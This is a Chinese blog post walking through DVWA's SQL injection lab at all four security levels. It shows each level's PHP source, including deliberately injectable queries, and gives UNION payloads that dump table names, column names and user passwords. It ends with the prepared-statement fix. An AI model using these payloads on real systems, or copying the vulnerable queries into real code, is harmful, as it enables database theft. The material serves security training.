【DVWA】sql注入_全级别

最新推荐文章于 2023-06-09 15:58:37 发布
最新推荐文章于 2023-06-09 15:58:37 发布
阅读量334 收藏 2
点赞数 1
分类专栏: 网安 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45378289/article/details/107088869
版权

1.low级别

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

分析:
没有过滤

解:
获取当前数据库
1’ union select 1,database() #

1’ union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema=database() #

1’ union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name=‘users’ #

获取数据
1’ or 1=1 union select user, password from users #

2.medium级别

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

分析:
mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。

解:
用low级别的方法,去掉 ‘ 号就行。

3.high级别

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

分析:
LIMIT 子句可以被用于强制 SELECT 语句返回指定的记录数。

解:
解法跟low级别一样,limit 1 用 # 注释掉了。

4.impossible级别

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

分析:
is_numeric() 函数用于检测变量是否为数字或数字字符串。
只能输入数字。

kudo_sama
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL注入
WY92139010的博客
05-03 964
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
Dvwa之SQL 注入级别学习笔记
Mbys_Lettuce的博客
09-15 1035
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
DVWA-SQL注入级别
小纯的博客
02-08 6381
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
dvwa sql 注入高级
gwl7878的博客
07-07 4058
cat sqli.txt  POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1 Host: 172.19.180.27 Proxy-Connection: keep-alive Content-Length: 19 Cache-Control: max-age=0 Accept: text/html,applicatio
DVWA-SQL注入等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-29 2962
DVWA-SQL注入等级绕过方法前言一、Low级别union注入判断字段数查表名查字段二、Medium级别二、High级别总结一些初学疑问为什么要加个单引号’,闭合到底是怎么用? 前言   在开始之前,先说一下我对SQL注入的原理的一些理解: SQL注入   是在输入的字符串中注入了SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而执行,因此遭到数据泄漏或者数据的破坏。   攻击者可以从数据库中获取敏感数据,造成大量敏感信息泄露;修改数据库内容,
DVWA SQL Injection(SQL注入等级
柠檬i的博客
12-19 3141
SQL Injection(回显注入) 目录:SQL Injection(回显注入)1. Low2.Medium3. High4.Impossible5.运用sqlmap自动化注入1.查看信息2.查看数据库名3.查看表名4.查看字段名5.查看字段数据登录 注入思路: 是否有注入?有无回显?是字符型还是数字型?
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
Dvwa之SQL盲注级别学习笔记
Mbys_Lettuce的博客
09-19 1339
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
DVWASQL注入
qq_46416934的博客
07-29 1248
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
kali下的SQL注入DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2054
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
sql注入实例--安全等级
12-26
使用WebGoat,根据提示信息 ,完成包括Injection Flaw大类下的String SQL注入,Numeric SQL注入,Log Spoofing,XPATH Injection等安全弱点的攻击测试。
SQL注入高级进阶
06-04
SQL注入高级进阶
DVWA--sql手工注入(高级)
firecjh的博客
06-09 567
实验环境:配置DVWA平台。进入DVWA平台,选择,将安全级别设置为High。点击,进入测试页面。2.判断列数。3.判断显错点。4.获取数据库名。5.获取表名。6.获取列名。7)获取数据。
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 1909
sqlmap测试dvwa-sql注入high
DVWASQL注入(低中高级)
qq_43455259的博客
01-20 4796
dvwasql注入
DVWA——SQL注入
qq_62803993的博客
01-08 2459
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWA-SQL Injection 级别教程
weixin_44716769的博客
09-08 564
SQL Injection 实验准备 Low 判断是否存在注入,注入是字符型还是数字型 当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。 输入1,查询成功 输入1’ and ‘1’ ='2,查询失败,返回结果为空。说明不存在数字型注入漏洞 输入1’ or ‘1234’='1234,查询成功。说明存在字符型注入 猜SQL查询语句中的字段数 输入1’ or 1=1 order by 1 #,查询成功 #是注释作用 输入
DVWA sql注入(低中高)
m0_73581247的博客
04-08 437
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
DVWA SQL注入(低中高三级)
Yanug
09-26 1755
low级 1.先进行简单的ID查询 输入输入正确的ID,将显示ID First name,Surname信息。 2.检测是否可以注入 可知此位为注入点,输入:‘ 返回错误 3.尝试遍历数据库表,提示输入的值是ID,可以初步判断此处为数字类型的注入。 尝试输入:1 or 1=1 没有达到目的,再尝试:1' or' 1' =' 1 显示出数据库中所有内容。 4.查询字段数 1’order by...
dvwa sql注入
最新发布
08-27
DVWA 中进行 SQL 注入练习,可以通过以下步骤进行: 1. 安装和配置 DVWA:首先,需要下载 DVWA,并将其部署到本地服务器或虚拟机中。然后,根据提供的说明进行配置,设置安全级别为“低”。 2. 寻找 SQL 注入点...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值